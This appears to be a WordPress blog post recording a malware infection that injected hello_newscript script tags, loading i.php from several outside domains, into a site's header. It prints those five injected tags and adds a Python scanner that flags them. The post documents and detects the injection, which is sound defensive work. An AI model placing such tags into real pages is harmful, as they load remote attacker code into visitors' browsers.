Today I encountered malware on WordPress that inserted several i.php requests into the website header, all with IDs starting with hello_newscript.

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php?ver=5.6.2' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php?ver=5.6.2' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php?ver=5.6.2' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php?ver=5.6.2' id='hello_newscript4-js'></script>

The client's website was loading slowly. Inspecting the page source revealed several JavaScript files that could not be loaded, as shown in the image below:

Source code analysis showed that the code above had been inserted into the page. Fortunately, some of these malicious sites had already had their servers shut down, while others were slow to reach from within China, so apart from the slow loading the website was not otherwise affected. The exact infection vector could not be determined: the injected code disappeared after several inactive plugins were deleted, so it is likely that one of those inactive plugins was infected. This post is purely for documentation purposes; hopefully you won't encounter this issue.
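
To check other pages or sites for the same injection, the following added example (not part of the original post) scans rendered HTML for script tags whose id matches the hello_newscript pattern shown above. It also flags off-site scripts served from a .php path, which is a heuristic assumption in case the handle is renamed. The function names and the example.com, example.net and example.org hosts are placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Handle pattern taken from the injected tags shown in the post.
HANDLE_RE = re.compile(r"^hello_newscript\d+-js$")


class ScriptAudit(HTMLParser):
    """Collect <script> tags that match the injection described in the post."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (reason, id, src)

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = {k: (v or "") for k, v in attrs}
        sid, src = a.get("id", ""), a.get("src", "")
        url = urlparse(src)
        host = (url.hostname or "").lower()
        offsite = bool(host) and host != self.site_host
        if HANDLE_RE.match(sid):
            self.findings.append(("known-handle", sid, src))
        elif offsite and url.path.lower().endswith(".php"):
            # Heuristic (assumption): script served by a third-party .php endpoint.
            self.findings.append(("offsite-php-script", sid, src))


def audit_html(html, site_host):
    """Return findings for one page; site_host is the site's own hostname."""
    parser = ScriptAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page; all hosts below are placeholders.
SAMPLE = """<html><head>
<script type='text/javascript' src='https://example.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1' id='jquery-core-js'></script>
<script type='text/javascript' src='https://example.net/images/i.php?ver=5.6.2' id='hello_newscript0-js'></script>
<script type='text/javascript' src='http://example.org/includes/i.php?ver=5.6.2' id='renamed-js'></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for reason, sid, src in audit_html(SAMPLE, "example.com"):
        print(f"{reason}: id={sid!r} src={src}")
```

A hit only shows that the page output is affected; the code that enqueues the scripts still has to be located in the theme or plugin files, inactive plugins included.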